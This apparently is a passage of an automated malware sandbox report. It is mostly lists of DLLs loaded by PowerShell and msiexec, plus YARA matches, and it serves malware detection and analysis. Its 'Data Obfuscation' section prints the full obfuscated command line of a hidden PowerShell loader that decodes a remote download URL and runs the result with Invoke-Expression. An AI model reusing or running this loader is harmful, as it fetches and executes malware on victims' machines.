                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: appresolver.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: bcp47langs.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rstrtmgr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: Binary string: System.Core.pdb4 source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: CallSite.Targetore.pdb;"b source: powershell.exe, 00000005.00000002.2378968135.00000000085A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**Q source: msiexec.exe, 0000000F.00000002.2571532371.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.oeaccount* source: msiexec.exe, 0000000F.00000002.2571532371.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdbh source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: Yara match File source: 00000005.00000002.2381021661.0000000009E8F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2380669297.0000000008A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($mekanikkernes)$gloBaL:mORtALWISE133 = [syStem.TexT.ENCoDInG]::AScii.GeTstRINg($ArcHAEOL)$gloBal:COMpUtErdrEVEt=$mORTAlWIse133.substRInG($budGettetS,$mIniFiCAtioN)<#Omstningsafgifter
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Ledelinjer $Muzzy $Unpretermitted), (Dekreterendes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Dnyr = [AppDomain]::CurrentDomain.GetAssemblies()$global
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Efterdateringer)), $Dobbersrtilleriets).DefineDynamicModule($Lonia, $false).DefineType($Kritikpunktet177, $Varekataloger49, [System.Mu
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($mekanikkernes)$gloBaL:mORtALWISE133 = [syStem.TexT.ENCoDInG]::AScii.GeTstRINg($ArcHAEOL)$gloBal:COMpUtErdrEVEt=$mORTAlWIse133.substRInG($budGettetS,$mIniFiCAtioN)<#Omstningsafgifter
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeo
                Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.tak
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeo
